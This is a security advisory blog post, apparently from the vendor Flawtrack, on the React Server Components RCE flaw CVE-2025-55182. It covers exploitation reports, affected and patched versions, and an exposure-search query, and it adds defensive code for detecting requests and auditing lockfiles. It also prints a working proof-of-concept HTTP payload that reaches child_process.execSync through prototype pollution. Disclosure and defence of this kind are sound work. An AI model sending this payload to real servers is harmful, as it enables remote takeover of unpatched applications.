React2Shell RCE: Patch CVE-2025-55182 Immediately
Critical RCE Flaw “React2Shell” Actively Exploited
On December 3, the web development community was alerted to CVE-2025-55182, a catastrophic unauthenticated remote code execution (RCE) vulnerability in React Server Components (RSC) dubbed “React2Shell.” With a maximum CVSS severity score of 10.0, this flaw poses an immediate and severe threat to countless web applications. The vulnerability is already under active exploitation by state-sponsored threat actors; immediate patching is not just recommended, it is critical.
This is not a theoretical threat; it is a clear and present danger. Within 24 hours of its public disclosure, AWS researchers reported that China-nexus threat actors began exploiting this flaw in the wild. As of December 5, CVE-2025-55182 has been added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog, underscoring the urgency for all organizations to assess their exposure and remediate.
Technical Analysis: Insecure Deserialization in RSC
React2Shell stems from an insecure deserialization weakness within the "Flight" protocol, which is fundamental to how React Server Components function. This protocol improperly handles JSON payloads sent to Server Function endpoints. An unauthenticated, remote attacker can send a specially crafted HTTP request containing a malicious payload; this payload exploits the deserialization process to execute arbitrary JavaScript code on the server, granting the attacker full control.
The widespread adoption of frameworks like Next.js, which leverage RSC, combined with the simplicity of triggering the vulnerability, creates a perfect storm for mass exploitation. Any internet-facing server running affected RSC code should be considered vulnerable until proven otherwise.
🚨 Censys on #React2Shell (CVE-2025-55182): We observe ~2.15M exposed web services running Next.js or other RSC-based frameworks—mostly in the U.S. and China. Not all are vulnerable, but active exploitation is underway. Patch now.
Global Impact and Active Exploitation
The attack surface for React2Shell is vast. Security researchers have identified hundreds of thousands of potentially vulnerable instances online:
- Shodan: Over 380,000 assets return the header "Vary: RSC, Next-Router-State-Tree", a strong indicator of RSC usage.
- Censys: Reports approximately 2.15 million exposed web services running Next.js or other RSC-based frameworks.
- Flawtrack Intelligence: Our platform has already detected over 3,500 assets infected with web shells and backdoors in Malaysia alone, confirming that attackers are moving swiftly from initial access to persistence.
State-sponsored groups like Earth Lamia and Jackpot Panda are actively scanning and exploiting this vulnerability, deploying malware shortly after gaining access. The low barrier to entry for exploitation means that less sophisticated actors will soon follow.
Proof of Concept: Exploitation in Action
Multiple proofs of concept (PoC) are now public, demonstrating how trivial it is to exploit this vulnerability. The following HTTP request triggers the RCE by sending a malicious multipart form payload to a Server Function endpoint, abusing the Flight deserialization logic described above.
```http
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```
This PoC leverages prototype pollution to manipulate the server's execution flow, ultimately calling child_process.execSync to run an arbitrary system command (xcalc in this example).
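As an added defender-side illustration (example code written for this page, not part of the advisory or of React/Next.js), the following Node.js inspector parses a Server Function request the way request-logging middleware or a WAF rule might, and flags the `$<id>:<path>` reference strings that walk `__proto__`/`constructor`, the trait the PoC above depends on. The regex, the header check and the constructed sample body are this example's own assumptions.

```javascript
// Added example (not code from the advisory, React or Next.js): a heuristic inspector
// for inbound Server Function requests. It parses the multipart body, walks every
// JSON-decodable field (also JSON nested in string values) and flags Flight-style
// reference strings ("$<id>:<path>") whose path walks __proto__ / constructor /
// prototype, as the PoC above does. The regex and header check are this example's own.
const SUSPICIOUS_REF = /^\$[^:]*:(?:[^:]*:)*(?:__proto__|constructor|prototype)(?::|$)/;
// Minimal multipart/form-data parser: [{ name, value }] per part (CRLF normalised).
function parseMultipart(body, boundary) {
  const parts = [];
  for (const raw of body.replace(/\r\n/g, '\n').split(`--${boundary}`)) {
    const chunk = raw.replace(/^\n+|\n+$/g, '');
    if (chunk === '' || chunk === '--') continue; // preamble or the closing "--"
    const split = chunk.indexOf('\n\n'); // part headers end at the first blank line
    const head = split === -1 ? chunk : chunk.slice(0, split);
    const value = split === -1 ? '' : chunk.slice(split + 2);
    parts.push({ name: (/name="([^"]*)"/.exec(head) || ['', '?'])[1], value });
  }
  return parts;
}
// Collect every string reachable from a decoded value, descending into embedded JSON text.
function collectStrings(value, out) {
  if (typeof value === 'string') {
    out.push(value);
    if (/^[\[{]/.test(value)) { try { collectStrings(JSON.parse(value), out); } catch (_) {} }
  } else if (value && typeof value === 'object') { // arrays and objects alike
    Object.values(value).forEach((v) => collectStrings(v, out));
  }
}
// Returns { suspicious, findings } for one request (header map + raw body string).
function inspectServerActionRequest(headers, body) {
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  const m = /boundary=([^;]+)/.exec(h['content-type'] || '');
  if (!('next-action' in h) || !m) return { suspicious: false, findings: [] };
  const findings = [];
  for (const { name, value } of parseMultipart(body, m[1].trim())) {
    let decoded; try { decoded = JSON.parse(value); } catch (_) { decoded = value; }
    const strings = []; collectStrings(decoded, strings);
    for (const s of strings) if (SUSPICIOUS_REF.test(s)) findings.push({ field: name, ref: s });
  }
  return { suspicious: findings.length > 0, findings };
}
// Constructed sample modelled on the PoC's reference strings (command string omitted).
const B = '----ExampleBoundary';
const SAMPLE_BODY = [`--${B}`, 'Content-Disposition: form-data; name="0"', '',
  '{"then":"$1:__proto__:then","status":"resolved_model","value":"{\\"then\\":\\"$B1337\\"}",' +
  '"_response":{"_prefix":"<omitted>","_formData":{"get":"$1:constructor:constructor"}}}',
  `--${B}`, 'Content-Disposition: form-data; name="1"', '', '"$@0"', `--${B}--`].join('\r\n');
const SAMPLE_HEADERS = { 'Next-Action': 'x', 'Content-Type': `multipart/form-data; boundary=${B}` };
console.log(JSON.stringify(inspectServerActionRequest(SAMPLE_HEADERS, SAMPLE_BODY)));
```

A hit here is a trigger for blocking or alerting, not proof of compromise on its own; the authoritative fix remains the version upgrade below.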
Vulnerability Breakdown: CVE-2025-55182
| Field | Description |
|---|---|
| CVE-ID | CVE-2025-55182 — CVSS 10 — Assigned by Facebook. |
| Vulnerability Description | React Server Components (RSC) and related packages improperly deserialize JSON payloads sent to Server Function endpoints. An attacker can supply a crafted payload via HTTP request — without authentication — that causes the server to execute arbitrary JavaScript code, leading to full RCE. |
| Date of Disclosure | December 3, 2025 |
| Affected Assets | Server‑side applications using React 19.x (RSC) including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Any frameworks that embed these packages, such as Next.js (App Router), React Router RSC preview, Waku, Vite RSC plugin, and RedwoodSDK, are also affected. |
| Vulnerable Versions | react-server-dom-* packages: 19.0.0, 19.1.0, 19.1.1, 19.2.0. Next.js: versions ≥ 14.3.0-canary.77 and all 15.x/16.x versions using App Router. |
| Exploitation Status | Actively Exploited. Confirmed by Amazon, CISA, and GreyNoise. China-aligned state-sponsored groups are leveraging this flaw. |
| Patch Status | Available. React patched to 19.0.1, 19.1.2, 19.2.1. Next.js patched to 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7. |
Detection and Mitigation
Immediate action is required to identify and remediate vulnerable systems. Security teams should prioritize scanning their external attack surface for indicators of affected frameworks.
Identifying Exposed Assets
You can use the following advanced search query on platforms like Censys to identify internet-facing services that may be running affected software. This query looks for specific HTTP headers, body content, and favicons associated with RSC and related frameworks.
```
web.endpoints.http.headers: (key: "Content-Type" and value: "text/x-component") or web.endpoints.http.headers: (key: "Vary" and value: "RSC") or web.software.product:"next.js" or web.endpoints.http.body:{"react-router-dom.js", "__WAKU_CLIENT_IMPORT__", "__WAKU_ROUTER_PREFETCH__", "__WAKU_HYDRATE__", "__WAKU_PREFETCHED__", "import.meta.viteRsc", "__vite_rsc", "__RWSDK_CONTEXT"} or web.endpoints.http.html_tags = "<meta name=\"generator\" content=\"Waku\"/>" or web.endpoints.http.favicons.hash_sha256 = "4ec926d579c8540e4eb8e4eff3d0fc9060410ce5218293ddebd9ddb36e76b7e6"
```
Remediation: Patch Immediately
The only effective mitigation is to update to a patched version. Do not delay.
- React: Upgrade to version 19.0.1, 19.1.2, or 19.2.1.
- Next.js: Upgrade to the latest patched versions, such as 15.0.5, 15.1.9, or higher depending on your branch.
Verify that all dependencies that embed the vulnerable react-server-dom packages are also updated.
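To make that dependency check mechanical, here is an added example (not the advisory's or the React/Next.js projects' own code) that audits a package-lock.json against the vulnerable and patched versions listed in the table above. The semver comparison, the "review" status for branches the page lists no patch for, and the sample lockfile are this example's own assumptions.

```javascript
// Added example (not code from the advisory, React or Next.js): audits a package-lock.json
// (lockfileVersion 2/3 "packages" map) against the version lists in the table above. The
// lists come from the page; the semver helper, status labels and sample lockfile are mine.
const RSD = ['react-server-dom-webpack', 'react-server-dom-parcel', 'react-server-dom-turbopack'];
const RSD_VULNERABLE = ['19.0.0', '19.1.0', '19.1.1', '19.2.0'], RSD_PATCHED = ['19.0.1', '19.1.2', '19.2.1'];
const NEXT_FIRST_VULNERABLE = '14.3.0-canary.77';
const NEXT_PATCHED = ['15.0.5', '15.1.9', '15.2.6', '15.3.6', '15.4.8', '15.5.7', '16.0.7'];
// Parse "MAJOR.MINOR.PATCH[-pre.release]" into numeric parts plus pre-release identifiers.
function parseSemver(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?$/.exec(v);
  if (!m) throw new Error(`unparseable version: ${v}`);
  return { nums: [+m[1], +m[2], +m[3]], pre: m[4] ? m[4].split('.') : null };
}
// Comparator (<0, 0, >0): a pre-release sorts before its release; numeric identifiers by value.
function compareSemver(a, b) {
  const A = parseSemver(a), B = parseSemver(b);
  for (let i = 0; i < 3; i++) if (A.nums[i] !== B.nums[i]) return A.nums[i] - B.nums[i];
  if (!A.pre || !B.pre) return (A.pre ? -1 : 0) - (B.pre ? -1 : 0);
  for (let i = 0; i < Math.min(A.pre.length, B.pre.length); i++) {
    const x = A.pre[i], y = B.pre[i], nx = /^\d+$/.test(x), ny = /^\d+$/.test(y);
    const d = nx && ny ? +x - +y : nx !== ny ? (nx ? -1 : 1) : x < y ? -1 : x > y ? 1 : 0;
    if (d !== 0) return d;
  }
  return A.pre.length - B.pre.length; // the longer identifier list is the later pre-release
}
// 'vulnerable' / 'ok' per the table, 'review' when the page lists nothing for that branch, else null.
function classify(name, version) {
  if (RSD.includes(name)) return RSD_VULNERABLE.includes(version) ? 'vulnerable' : RSD_PATCHED.includes(version) ? 'ok' : 'review';
  if (name !== 'next') return null;
  if (compareSemver(version, NEXT_FIRST_VULNERABLE) < 0) return 'ok';
  const [major, minor] = parseSemver(version).nums;
  const fix = NEXT_PATCHED.find((p) => p.startsWith(`${major}.${minor}.`));
  if (!fix) return 'review'; // e.g. 14.3 canaries: affected per the table, but no 14.x patch is listed
  return compareSemver(version, fix) < 0 ? 'vulnerable' : 'ok';
}
// Walk the lockfile's "packages" map (nested node_modules included) and report.
function auditLockfile(lock) {
  const out = [];
  for (const [key, entry] of Object.entries(lock.packages || {})) {
    const status = classify(key.split('node_modules/').pop(), entry.version);
    if (status) out.push({ path: key, version: entry.version, status });
  }
  return out;
}
const SAMPLE_LOCK = { lockfileVersion: 3, packages: { // constructed, not a real project
  'node_modules/next': { version: '15.4.7' }, 'node_modules/react': { version: '19.2.0' },
  'node_modules/react-server-dom-webpack': { version: '19.2.0' },
  'node_modules/some-tool/node_modules/next': { version: '15.5.7' } } };
console.log(auditLockfile(SAMPLE_LOCK));
```

Nested copies under another package's node_modules are reported too, which is where a framework bundling its own react-server-dom-* copy would otherwise hide.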
Secure Your Attack Surface with Flawtrack
React2Shell demonstrates the critical need for continuous attack surface monitoring. A vulnerability can go from disclosure to mass exploitation in less than a day; you cannot afford to be unaware of your exposure.
The Flawtrack platform provides comprehensive visibility into your external assets, identifying vulnerable software and misconfigurations before attackers can exploit them. We help you cut through the noise and prioritize critical risks like CVE-2025-55182.
Contact Flawtrack for a full analysis of your attack surface and protect your organization from the next critical threat.